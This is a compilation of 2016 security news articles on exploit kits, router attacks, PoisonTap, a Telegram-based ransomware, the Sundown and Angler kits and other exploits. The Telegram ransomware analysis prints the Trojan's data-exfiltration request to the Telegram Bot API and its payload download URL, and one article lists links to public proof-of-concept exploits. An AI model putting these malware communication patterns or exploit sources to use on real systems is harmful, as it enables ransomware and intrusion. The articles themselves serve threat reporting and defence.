Exploit  Articles -  H 2020 1  2  3  4  5  6  7   Exploit  List -  H  2021  2020  2019  2018  1  Exploit blog  Exploit blog


DNSChanger Exploit kit targets Home routers in malvertising campaign

18.12.2016 securityaffairs Exploit

Security experts observed malvertising campaign leveraging the DNSChanger malware to compromise multiple models of home routers.
The Christmas season can be the busiest time of the year for online shopping in many countries. Researchers at Proofpoint have recently announced the discovery of a new and improved version of the DNSChanger Exploit Kit.

“Since the end of October, we have seen an improved version of the “DNSChanger EK” [1] used in ongoing malvertising campaigns. DNSChanger attacks internet routers via potential victims’ web browsers; the EK does not rely on browser or device vulnerabilities but rather vulnerabilities in the victims’ home or small office (SOHO) routers. ” states the analysis published by ProofPoint.

The malware is used in malvertising campaigns and targets home routers.

When a victim clicks on a malicious link the malware, differently from most exploit kits in the wild, doesn’t attack the operating system or the browser but the home or small office router.

Once the router is compromised the victim’s internet traffic can be routed to any possible phishing sites and the victim could remain under constant malvertising attack that would help criminal to increase the damage they cause.

The similarities this attack campaign has with the “CSRF Soho Pharming” campaign uncovered at the beginning of 2015 suggests the same actors could be behind this new view of the attack. However, researchers note that several improvements were made to the exploit kit, which renders it more dangerous.

“Attack pattern and infection chain similarities led us to conclude that the actor behind these campaigns was also responsible for the “CSRF (Cross-Site Request Forgery) Soho Pharming” operations in the first half of 2015 [1].” continues the analysis.

The new version includes some additional features such as;

External DNS resolution for internal addresses
An AES key to decrypt the list of fingerprints / default credentials and local resolutions
Dozens of recent router exploits
When possible the exploit kit modifies the network rules to make the administration ports available from external addresses, exposing the router to additional attacks like those perpetrated by the Mirai botnets
The malvertising chain is now accepting Android devices as well.
dnschanger exploit kit-routers

The victim is initially compromised by advertisements on legitimate websites. Once the malware is installed on the victim’s browser (Chrome for Windows and Android), it tries to locate and identify the router. The exploit kit then receives the instructions to exploit that specific make/model. The exploit kit makes extensive use of steganography techniques such as HTML code hidden in the comment field of a PNG file.

DNSChanger seems to target large ad agencies by redirecting their traffic to other third party ad services.

The malware can currently exploit a large number of different router make and models including the following newly added exploits;

D-Link DSL-2740R
COMTREND ADSL Router CT-5367 C01_R12
NetGear WNDR3400v3 (and likely other models in this series)
Pirelli ADSL2/2+ Wireless Router P.DGA4001N
Netgear R6200
There are currently no real effective mitigation techniques for this attack except making sure the router firmware is updated to the latest version.

Any attack compromising the DNS on any network can provide the attacker with a wide range of new attack vectors including man-in-the-middle, frauds, and phishing attacks.


Security expert disclosed a full zero-day drive-by exploit for Linux leveraging SNES

18.12.2016 securityaffairs Exploit

The security expert Chris Evans has disclosed a zero-day exploit successfully tested on Ubuntu and Fedora distributions that may affect other distros.
The security expert Chris Evans has disclosed a zero-day exploit for Ubuntu and Fedora distributions. The flaw is a full drive-by download exploit that may impact also other Linux distributions.

The researcher successfully the full zero-day drive-by exploit against Fedora 25 + Google Chrome and Ubuntu 16.04 LTS, and relies on breaking out of Super Nintendo Entertainment System (SNES) emulation “via subtle cascading side effects from an emulation error.”

“full reliable 0day drive-by exploit against Fedora 25 + Google Chrome, by breaking out of Super Nintendo Entertainment System emulation via cascading side effects from a subtle and interesting emulation error.” explained Evans in a blog post.

The problem lies within the Sony SPC700 emulated processor and exploits cascading subtle side effects of an emulation hole.

The Linux GStreamer media playback framework supports the playback of SNES music files by emulating the SNES CPU and audio processor due to an agreement with Game Music Emu.

Linux zero-day

The emulation process supported by the Sony SPC700 processor is affected by at least two flaws, a missing X register value clamp for the MOV (X)+, A instruction, and a missing SP register value clamp for the RET1 instruction.

Evans chained the two issues for his attack, he demonstrated that it possible to compromise the target system by tricking the user into visiting a malicious web page that contains audio files encoded in the SPC music format, but saved with the. flac and. mp3 extensions.

The files work as the vector for the malicious code that loaded and executed by the victims with the same privileges as those of the current user.

The full drive-by download exploit could allow the attacker to steal personal data, including photos, videos, or documents, as well as data stored in the browser.

Evans published the following video PoC videos working on Fedora 25 and Ubuntu 16.04 LTS alongside the files needed to test the exploit.


Evans provided further details on the impact of the hack on both Linux distribution he tested, he highlighted that the general lack of sandboxing contributes to the severity of the issue.

“Impact is mixed. On Ubuntu, the faulty code is installed and on the attack surface by default, if you select the “mp3” option during install — which I certainly always do. On Fedora, there’s a very sensible decision to split gstreamer1-plugins-bad into multiple packages, with only gstreamer1-plugins-bad-free installed by default. This limits the attack surface and does not include Game Music Emu. Of course, the gstreamer framework will happily offer to install gstreamer1-plugins-bad-free-extras, with a very nice UI, if the victim simply tries to open the relevant media file.” added Evans.
“As always, the general lack of sandboxing here contributes to the severity. I think we inhabit a world where media parsing sandboxes should be mandatory these days. There’s hope: some of my other recent disclosures appear to have motivated a sandbox for Gnome’s tracker.”


Adobe Flash Player flaws remain the most used by Exploit Kits
7.12.2016 securityaffairs
Exploit
Experts from the firm Recorded Future published a report on the most common vulnerabilities used by threat actors in the exploit kits.
Recorded Future published an interesting report on the most common vulnerabilities used by threat actors in the exploit kits.

The experts observed that Adobe Flash Player and Microsoft products (Internet Explorer, Silverlight, Windows) continue to be privileged targets of threat actors. Hacking campaigns conducted by nation-state actors have dominated the threat landscape in 2016, while crooks used exploit kits to deliver several families of malware, including ransomware and banking trojans.

The experts noticed that hackers have used new exploit kits targeting new vulnerabilities.

The researchers highlighted that the Adobe Flash Player comprised six of the top 10 vulnerabilities triggered by the exploit kits in a period from November 16, 2015 to November 15, 2016.

exploit kits flaws

RecordedFuture analyzed 141 exploit kits, experts noticed that the Internet Explorer flaw tracked as CVE-2016-0189 was the most referenced on security blogs, deep web forum postings and dark web sites.

This vulnerability was widely exploited by hackers behind the CNACOM campaign and its had been exploited in targeted attacks against Windows users in South Korea before Microsoft fixed it.

Experts from startup Theori have made a reverse engineering of the MS16-053 that fixed the CVE-2016-0189 flaw and published a PoC exploit for the vulnerability.

The PoC code works on Internet Explorer 11 running on Windows 10, a great gift for fraudsters that included it in the Neutrino EK and Magnitude, and many other exploit kits such as Angler, RIG, Nuclear, Spartan and Hunter.


Exploit kits and top-vulnerabilities-2016

The above list of vulnerabilities used by exploit kits also includes the Adobe Flash flaw tracked as CVE-2016-1019, CVE-2016-4117, CVE-2016-1010, and CVE-2015-8651.

The list includes also Microsoft Silverlight flaw tracked as CVE-2016-0034 and Microsoft Windows flaw tracked as CVE-2014-4113

According to Recorded Future after the Angler and Nuclear EKs disappeared from the threat landscape RIG became the most used EK, while the popularity of the Sundown EK rapidly increased.

Let me close with the Key Takeaways published by Recorded Future.

Adobe Flash Player provided six of the top 10 vulnerabilities used by exploit kits in 2016. Since our 2015 ranking, Flash Player’s popularity with cyber criminals remains after increased Adobe security issue mitigation efforts.
Vulnerabilities in Microsoft’s Internet Explorer, Windows, and Silverlight rounded out the top 10 vulnerabilities used by exploit kits. None of the vulnerabilities identified in last year’s report carried over to this year’s top 10.
A 2016 Internet Explorer vulnerability (CVE-2016-0189) saw the most linkage to exploit kits, notably Sundown EK which quickly adopted an exploit in July 2016.
Sundown, RIG, and Neutrino exploit kits filled the void created by Angler Exploit Kit’s June 2016 demise. This crimeware can be used for anywhere from $200 a week (RIG) to $1,500 a week (Neutrino).
Adobe Flash Player’s CVE-2015-7645 has been incorporated into seven exploit kits, the highest penetration level of our analyzed vulnerabilities likely because it was the first zero-day discovered after significant Adobe security changes.
Identifying frequently exploited vulnerabilities can drive action by vulnerability assessment teams.


PoisonTap hacking tool can compromise any password-protected PC
18.11.2016 securityaffairs Exploit

Samy Kamkar has created a new hacking tool, dubbed PoisonTap, to easily hack into a password-protected computer.
PoisonTap is a new hacking tool that could be used by attackers to easily access to a password-protected computer, hijack all its Internet traffic, and also install backdoors.

Try to imagine who is the hacker behind this new tool?

Samy Kamkar, of course.

YouTube ‎@YouTube
Segui
Samy Kamkar ✔ @samykamkar
I've released PoisonTap; attacks *locked* machines, siphons cookies, exposes router & backdoors browser w/RasPi&Node https://youtu.be/Aatp5gCskvk
12:58 - 16 Nov 2016 · West Hollywood, CA
745 745 Retweet 905 905 Mi piace
Samy Kamkar (@SamyKamkar) is one of the most prolific experts that periodically presents to the security community his astonishing creations, such as MagSpoof, the Combo Breaker, OpenSesame and KeySweeper

PoisonTap is a $5 Raspberry Pi Zero runs some Node.js code that the expert has publicly released. Once the attacker connects the hacking tool to a Windows or Mac computer via USB, it starts loading the exploits needed to hack the machine.

Samy Kamkar explained that the device is able to compromise machines, even if they are locked.

“[PoisonTap] produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors,” explained Kamkar.

poisontap-1

Once the hacking tool is recognized by the host machine (Windows and OS X) it is loaded as a low-priority network device that emulates an Ethernet device over USB.

The machine sends a DHCP request to the tool that in response tells it that the entire IPv4 address space is part of PoisonTap’s local network. In this way, the entire traffic it routed through the PoisonTap device before reaching the legitimate gateway to the Internet. With this trick, the hacking tool is able to steal HTTP cookies and sessions for the Alexa top 1 million websites from the victim’s browser.

poisontap-2

Once the attacker has collected the cookies he is able to take over the victim’s online accounts, also bypassing two-factor authentication (2FA).

“As long as a browser is running on the machine and an HTTP request is made automatically – such as through an ad, AJAX request, or other dynamic web content, which happens on most sites, even when the browser is entirely in the background, PoisonTap intercepts the request and responds with attack code that’s interpreted by the browser,” Kamkar explains in the video.

The attacker could also use the device to install web-based backdoors for hundreds of thousands of domains, and establish a remote access channel to the victim’s router.

Since PoisonTap is able to bypass HTTPS protection if the “secure” cookie flag and HSTS are not enabled.

The device is powerful, Kamkar explained that it can also bypass many other security mechanisms, including same-origin policy (SOP), HttpOnly cookies, X-Frame-Options HTTP response headers, DNS pinning and cross-origin resource sharing (CORS).

Once the machine is compromised and the backdoor is established, the attacker is able to control the target even after the hacking tool is unplugged.

“Whenever the websocket is open, the attacker can remotely send commands to the victim and force their browser to execute JavaScript code,” added Kamkar.

Below the video PoS published by Kamkar.

In order to mitigate such kind of attacks on a server side operators can properly implement HTTPS and use HSTS to prevent downgrade attacks.

Below the measures suggested by Samy for Server-Side Security:

Use HTTPS exclusively, at the very least for authentication and authenticated content
Honestly, you should use HTTPS exclusively and always redirect HTTP content to HTTPS, preventing a user being tricked into providing credentials or other PII over HTTP
Ensure Secure flag is enabled on cookies, preventing HTTPS cookies from leaking over HTTP
When loading remote Javascript resources, use the Subresource Integrity script tag attribute
Use HSTS to prevent HTTPS downgrade attacks


The first cryptor to exploit Telegram
10.11.2016 Kaspersky Exploit
Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.

What is a cryptor?

In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.

There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.

Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.

Analyzing the Telegram Trojan

The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).

Then it contacts the threat actors using the publicly available Telegram Bot API and operates as a Telegram bot, using the public API to communicate with its creators.

In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.

The Trojan then sends a request to the URL https://api.telegram.org/bot<token>/GetMe, where <token> the unique ID of the Telegram bot, created by the cybercriminals, is stored. According to the official API documentation, the method ‘getMe’ helps to check if a bot with the specified token exists and finds out basic information about it. The Trojan does not use the information about the bot that the server returns.

The Trojan sends the next request using the method ‘sendMessage’ which allows the bot to send messages to the chat thread of the specified number. The Trojan then uses the chat number hardwired into its body, and sends an “infection successful” report to its creators:

https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

The Trojan sends the following parameters in the request:

<chat> – number of the chat with the cybercriminal;

<computer_name> – name of the infected computer;

<infection_id> – infection ID;

<key_seed> – number used as a basis to generate the file encryption key.

After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.

File extensions selected for encryption

Depending on its configuration, the Trojan may add the extension ‘.Xcri’ to the encrypted files, or leave the extension unchanged. The Trojan’s sample that we analyzed does not change file extensions. A list of encrypted files is saved to the text file ‘%USERPROFILE%\Desktop\База зашифр файлов.txt’.

After encryption, the Trojan sends the request https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>stop.

In this request, all parameters are the same as in the previous request, but the word ‘stop’ is added at the end.

Then the Trojan downloads the extra module Xhelp.exe (URL: http://***.ru/wp-includes/random_compat/Xhelp.exe) from a compromised site created using WordPress, and launches it. This module, called “Informer” (‘Информатор’ in the original Russian) by the cybercriminals, has a graphical interface and informs the victim about what has happened, and puts forward the ransom demand. The ransom is 5,000 RUB which is accepted via Qiwi or Yandex.Money payment methods.

Screens demonstrated to the victim user

The victim can communicate with the cybercriminals via a dedicated entry field in the “Informer” interface. This feature is also based on sending a Telegram message using the method ‘sendMessage’.

Multiple language mistakes in the ransom texts suggest the grade level of the Trojan’s creators. There is also a final phrase which catches the attention: “Thank you for helping Young Programmers Fund”.

Safeguarding measures

All Kaspersky Lab products detect this threat with the following verdicts:

Trojan-Ransom.Win32.Telecrypt
PDM:Trojan.Win32.Generic

MD5:

3e24d064025ec20d6a8e8bae1d19ecdb – Trojan-Ransom.Win32.Telecrypt.a (the main module)
14d4bc13a12f8243383756de92529d6d – Trojan-Ransom.Win32.Telecrypt.a (the ‘Informer’ module).

If you have fallen victim to this encryption malware, we strongly advise you not to pay the ransom. Instead, contact Kaspersky Lab’s support team and we will help you decrypt your files.


Sundown exploit kit – Conquering the criminal underground
3.11.2016 securityaffairs Exploit

Cisco Talos group analyzed the evolution of the Sundown exploit kit that over the past six months has become responsible for a large number of infections.
Over the past months, the threat landscape for exploit kits is rapidly changing. Angler EK, Neutrino EK, and Nuclear EK that for years monopolized the criminal underground disappeared.

Now, researchers at Cisco Talos group analyzed the rapid evolution of a new threat, the Sundown exploit kit that over the past six months has become responsible for a large number of infections.

“Over the last six months the exploit kit landscape has seen some major changes.” reads a blog post published by the Talos Group. “What remains is a group of smaller exploit kits vying for pole position in an industry that continues to generate millions of dollars from payloads such as ransomware and banking trojans.”

“It’s now time to turn to another exploit kit that is active on the landscape, Sundown. The Sundown exploit kit has previously been part of a second tier of exploit kits that includes Magnitude and Sweet Orange. These kits successfully compromise users, but typically are not accompanied with the advanced techniques and wide-spread use of the other major exploit kits. It’s not to say these kits aren’t significant threats, but from a potential victim perspective they historically do not have the reach associated with other EKs from before such as Angler or RIG.”

The Sundown EK ranks today at the second place, behind RIG EK that is the most used crimeware kit in the criminal ecosystem.

Threat actors behind the Sundown exploit kit leverage on an infrastructure composed of 80,000 malicious subdomains associated with more than 500 domains.

The experts observed that crooks behind the Sundown exploit kit criminals are using wildcards for subdomains which are exponentially growing the number of routes for malicious traffic to servers hosting the dreaded EK.

The downside to the use of wildcards is the impact on the core domain. If the domain is active, if someone tries to resolve that particular domain, it will redirect to the malicious server used by the crooks.

In one case, the researchers observed in a 24-hour period a particular Sundown domain generating three subdomains a minute.

“For a 24 hour period this particular Sundown campaign was seen generating approximately 3 subdomains a minute for the entire day.” states the analysis.

Unique Sundown Exploit Kit per day
Count of Unique Sundown Subdomains by Day (Talos analysis)

While the RIG EK was used to dropping a variety of malware, including malicious payloads, banking Trojans, and data stealers, the Sundown exploit kit was only used to serve banking Trojans. Talos has observed Sundown campaigns leveraging both Adobe Flash and Silverlight vulnerabilities to hack into victims’ systems.

“One interesting aspect is that they used standard extensions for those files. All requests for flash files end in “.swf” and all silverlight requests end in “.xap” which isn’t particularly common for exploit kits as they typically will try and obfuscate the activity.” continues the analysis.

Talos highlighted the blunder made by the threat actors, browsing directly to an active Sundown landing page without any parameters the researchers retrieved a Base64 encoded Sundown Logo instead of getting some empty data or a 404 data.

The text on the image states “Yugoslavian Business Network.”

sundown-exploit-kit

For more information give a look at the report that includes also the IOC for the Sundown exploit kit:

Domains
IP Addresses


36000 SAP systems exposed online, most open to attacks

2.8.2016 Zdroj: helpnetsecurity.com Exploit

ERPScan released the first comprehensive SAP Cybersecurity Threat Report, which covers three main angles: Product Security, Implementation Security, and Security Awareness.

The company used its own scanning method to gather information.

“Protocols used to interact with and between SAP servers are often proprietary and not well-known outside of the SAP IT world. It means that open scan resources don’t include those specific protocols in their scans,” Mathieu Geli, Director of SAP Threat intelligence, explained.

“That’s why we built a database of probe requests and then matches probe response to determine the state of the service. When we perform a check for a vulnerability; if there is no friendly payload, we try to fingerprint the version of a remote service to compute potential statistics.”

The key finding of the research are as follows:

SAP Product Security

The average number of security patches for SAP products per year has slightly decreased. However, it doesn’t mean that the number of the issues has dropped too. SAP now fixes multiple vulnerabilities in one patch while 3 years ago each patch addressed a particular one. In that period SAP has released 3662 patches. Most of them (73%) were rated high priority and hot news, which means they pose significant risks to an organization security.
The list of vulnerable platforms has extended and now it includes modern cloud and mobile technologies such as HANA. Because of cloud and mobile technologies, new SAP Systems became more exposed to the Internet and thus every vulnerability identified in these services can affect thousands of multinationals (just remember that 90% of the Fortune 2000 companies use SAP). For example, the latest reported issues in SAP Mobile affect more than a million of mobile devices and SAP HANA vulnerability affect 6000+ companies that use SAP HANA.
There are vulnerabilities in almost every SAP module: CRM takes the leading position among them. According to this study, the most vulnerable products are CRM, EP, and SRM. However, one shouldn’t underestimate vulnerabilities affecting SAP HANA and SAP Mobile apps, as they attracted researchers’ (and, unfortunately, hackers’) attention quicker than the traditional modules.
The number of vulnerabilities in industry-specific solutions has grown significantly. SAP has a set of products designed for particular industries. More than 160 vulnerabilities have been detected in these solutions. The most vulnerable types of industry-specific solutions are SAP for Banking, Retail, Advertising Management, Automotive, and Utilities.
SAP Implementation Security

Worldwide threat landscape grew up to more than 36000 systems. Most of those services (69%) should not be available directly via the Internet.
Countries where most of the exposed system are located

Critical Infrastructures and IoT devices are at risk. SAP does not only manage enterprise resources but also acts as a mediator between IT and OT systems. Thus, insecure SAP configurations can be used to exploit critical infrastructure.
SAP Security Awareness

Almost half of unnecessarily exposed services is located in 3 countries where wide adoption of new technologies takes place (such as USA, India, and China).
Exposed systems around the globe

The number of SAP Security talks delivered at different conferences worldwide correlates with the number of unnecessarily exposed services (Comparing to the total number of implemented systems). Countries where the highest number of SAP Security presentations were delivered (namely, the USA, Germany, and the Netherlands) are characterized by more secure SAP system installations than countries where SAP researchers did not present their studies. ERPScan is proud to be invited to speak in 25 different countries across 6 continents including such places as Cyprus, Kuwait, Hungary, etc. Hopefully, it somehow helped to increase SAP Security awareness worldwide.


CVE-2016-4117 – FireEye revealed the exploit chain of recent attacks
16.5.2016 Exploit

The FireEye researcher Genwei Jiang revealed the exploit chain related to phishing attacks leveraging CVE-2016-4117 flaw recently fixed by Adobe.
Security experts at FireEye have recently spotted an attack leveraging on an Adobe zero-day vulnerability (CVE-2016-4117) recently patched.

The CVE-2016-4117 flaw affects older versions of the Adobe Flash, a few days ago the company was informed of a new zero-day vulnerability in the Flash Player software that was being exploited in cyber attacks in the wild. The company announced the fix for the CVE-2016-4117 on May 12 and confirmed that it affected Windows, Mac OS X, Linux and Chrome OS.

Adobe rated as critical the vulnerability, the issue was discovered by the security expert Genwei Jiang from FireEye, which also confirmed that it is being used in targeted attacks.

“A critical vulnerability (CVE-2016-4117) exists in Adobe Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.” reads the advisory published by Adobe.

“Adobe is aware of a report that an exploit for CVE-2016-4117 exists in the wild. Adobe will address this vulnerability in our monthly security update, which will be available as early as May 12. For the latest information, users may monitor the Adobe Product Security Incident Response Team blog.”

After the flaw was fixed, Genwei Jiang revealed the details of the previously undisclosed phishing attacks he reported to Adobe.

The experts explained that threat actors used phishing links and files to compromise Windows systems running Flash, and Microsoft Office.

The expert explained that threat actors embedded the Flash exploit inside a Microsoft Office document, which they then hosted on a web server they controlled. They used a Dynamic DNS (DDNS) domain to reference the document and the malicious payload.

When victims open the malicious document, then the exploit downloads and executes the payload hosted on the crooks’ server. In order to avoid suspicion and make the attack stealth, threat actors then display victims a decoy document.

“On May 8, 2016, FireEye detected an attack exploiting a previously unknown vulnerability in Adobe Flash Player (CVE-2016-4117) and reported the issue to the Adobe Product Security Incident Response Team (PSIRT). Adobe released a patch for the vulnerability inAPSB16-15 just four days later.” reads a blog post published by FireEye.

“Attackers had embedded the Flash exploit inside a Microsoft Office document, which they then hosted on their web server, and used a Dynamic DNS (DDNS) domain to reference the document and payload. With this configuration, the attackers could disseminate their exploit via URL or email attachment. Although this vulnerability resides within Adobe Flash Player, threat actors designed this particular attack for a target running Windows and Microsoft Office.”

The post published by FireEye details the attack that proceeds as follows:

The victim opens the malicious Office document.
The Office document renders an embedded Flash file.
If the Flash Player version is older than 21.0.0.196, the attack aborts.
Otherwise, the attack runs the encoded Flash exploit.
The exploit runs embedded native shellcode.
The shellcode downloads and executes a second shellcode from the attacker’s server.
The second shellcode:
Downloads and executes malware.
Downloads and displays a decoy document.
The malware connects to a second server for command and control (C2) and waits for further instructions.
CVE-2016-4117 attack chain
Experts are warning about a possible spike in the attacks exploiting this flaw that was recently fixed.

Users should install the latest Adobe patch as soon as possible and FireEye suggests them to employ additional mitigations, such as Microsoft EMET to prevent exploit attacks.


The hidden information behind 12,000 PoC Exploits shared online
9.5.2016 Exploit

A study conducted by Recorded Future on PoC exploits shared online over the last year shows that social media is the main distribution channel.
Security experts at the threat intelligence firm Recorded Future have conducted an interesting study on the proof-of-concept exploits shared online (e.g. On Twitter, on forum linking to personal blogs, GitHub, or Pastebin) last year.

The PoC exploits are developed by threat actors and security experts to demonstrate the existence of s security flaw into a target system and how to exploit it.

In some cases, hackers publicly disclose PoC exploits to force a company to develop a patch to fix critical flaws in their products.

The research allowed the discovery of roughly 12,000 references to PoC exploits shared online since March 22, 2015, an amazing data is we consider that it represents a near 200 percent increase compared to the previous year.

According to the report, the majority of PoC exploits were spread via social media networks (97 percent of cases), mainly via Twitter, followed by Code Repositories (1.8 percent of cases). The choice is not casual, social media allow users to reach a wider audience instantly.

“Our research shows that POCs are disseminated primarily via Twitter, with users flagging POCs to view externally in a range of sources — code repositories (GitHub), paste sites (Pastebin), social media (Facebook and Reddit surprisingly), and deep web forums (Chinese and Spanish forums).” states the study.

SOURCE COUNT RATE
Social Media 11,549 97%
Code Repository 215 1.8%
Mainstream 42 0.35%
None 33 0.28%
Niche 26 0.22%
Blog 22 0.18%
Forum 11 0.09%
Exchange 4 0.03%
Malware/Vulnerability Technical Reporting 2 0.02%
Paste Site 2 0.02%
Which are the targets of the POC exploits?

Most targeted technologies are Android (35,8), DNS (23,2), SSH (20,3). The products being targeted are Android phones, Microsoft Windows 7 and 8, Microsoft Internet Explorer, Linux, GNU C Library (glibc), and Firefox.

shared poc exploits Recorded Future

Giving a look to the list of the most widely distributed PoC we can observe that the CVE-2015-7547 buffer overflow flaw is the one with the greatest number of PoC exploits. The flaw affects the GNU C Library and could be exploited by hackers to trigger a buffer overflow through malicious DNS response.

Other PoC exploits shared online are related to the CVE-2015-1635 and the CVE-2016-0051 in Microsoft Windows Server, and the CVE-2015-3456, aka the VENOM flaw, in the

The analysis of the top 10 vulnerabilities discussed around POCs suggests a huge focus on Linux boxes and Microsoft Windows Servers, clearly due to their diffusion.

“According to open source intelligence (OSINT) collections by Recorded Future, here are some of the most linked to POCs over the last year:”

CVE-2015-3456 (Venom): https://marc.info/?l=oss-security&m=143155206320935&w=2
CVE-2015-2370 / MS15-076: https://www.exploit-db.com/exploits/37768/
CVE-2016-0051: https://github.com/koczkatamas/CVE-2016-0051
CVE-2015-1635 / MS15-034: http://pastebin.com/raw/ypURDPc4
“Researchers and malicious actors focus their time on developing POCs for Web servers/services and consumer products in the Microsoft Office suite, Microsoft IE, etc. These are used across the commercial, consumer, and government sector widely,” explained Nick Espinoza from Recorded Future.


 

Author of the Angler EK integrated recently Silverlight exploit
25.2.2016 Exploit

The security researcher Kafeine confirmed that the authors of the Angler EK have integrated the exploit for a recently patched Microsoft Silverlight vulnerability.
Ransomware is becoming one of the most dreaded cyber threats for netizens, security experts noticed a surge in the number of cyber attacks aimed to spread malware like Cryptowall and TeslaCrypt. Exploit kits like the Nuclear EK and the Angler EK are the privileged vectors to serve this specific family of malware, cyber criminals constantly improve their code in order to compromise the largest possible number of victims.

The security expert Kafeine has recently discovered that the authors of the Angler EK have added the code of a Silverlight exploit leveraging on the CVE-2016-0034 vulnerability.

The flaw was fixed by Microsoft in January with the MS16-006 critical bulletin, an attacker can exploit it for remote code execution. The Silverlight flaw discovered by the experts in Kaspersky Lab as a result of an investigation on the Hacking Team arsenal disclosed in July 2015.

According to Microsoft, the remote code execution vulnerability can be exploited by an attacker that set up a website to host a specially crafted Silverlight application.

When Microsoft users will visit the bogus website, the exploit will allow an attacker to obtain the same permissions as the victim.

On February 18, 2016, Kafeine noticed that the author behind Angler had added code for the Silverlight exploit, according to the expert the integration was completed on February 22.

Anton Ivanov, a senior malware researcher at Kaspersky confirmed that an exploit for the Silverlight exploit has been integrated to the Angler EK.

Kafeine explained that the CVE-2016-003 exploit has been used to spread a variant of the TeslaCrypt ransomware, the attacks works only with Silverlight version previous the current one, Silverlight 5.1.41212.0.

Angler EK TeslaCrypt ransomware Kafeine 12
Angler EK dropping Teslacrypt via silverlight 5.1.41105.0 after the “EITest” redirect 2016-02-22 (Kafeine blog post)

The experts at Ars Technica who analyzed the HAcking Team’s leaked emails noticed communications between a Russian developer named Vitaliy Toropov and the staff of the Hacking Team.

The man sold an Adobe Flash Player exploit to the Hacking Team for $45,000 in 2013 and also offered a Silverlight exploit.

“Now your discount on the next buy is -5k and -10k is for a third bug. I recommend you the fresh 0day for iOS 7/OS X Safari or my old Silverlight exploit which was written 2.5 years ago and has all chances to survive further in next years as well. ” Toropov wrote to Hacking Team member Giancarlo Russo.

Experts at Kaspersky started analyzing Toropov’s exploits, including a Silverlight Microsoft Silverlight Invalid Typecast / Memory Disclosure that was dated back 2013 and that he had published.

Kaspersky issued a YARA rule to detect the exploit in the wild, and on November 25th, the company detected the Toropov’s exploit on a user’s machine. Later another sample of the exploit was uploaded from Laos to a multiscanner service.

“After implementing the detection, we waited, hoping that an APT group would use it. Since Vitaliy Toropov was offering it to Hacking Team, we also assumed that he sold it to other buyers, and what good is a zero-day if you don’t use it? Unfortunately, for several months, nothing happened. We had already forgotten about this until late November 2015.” Kaspersky researchers wrote in a blog post. “On November 25th, one of our generic detections for Toropov’s 2013 Silverlight exploit triggered for one of our users. Hours later, a sample was also uploaded to a multiscanner service from Lao People’s Democratic Republic (Laos).”

The analysis of the exploit revealed that the exploit was compiled on July 21, 2015, after the Hacking Team data was leaked online. Kaspersky immediately reported the existence of the exploit to Microsoft.

It’s unclear if this Silverlight exploit is the same offered by Toropov in 2013,

“One of the biggest questions we have is whether this is Vitaliy Toropov’s Silverlight zero-day which he tried to sell to Hacking Team. Or is it a different one? Several things make us think it’s one of his exploits, such as the custom error strings. Of course, there is no way to be sure and there might be several Silverlight exploits out there. One thing is for sure though – the world is a bit safer with the discovery and patching of this one.” wrote Kaspersky researchers.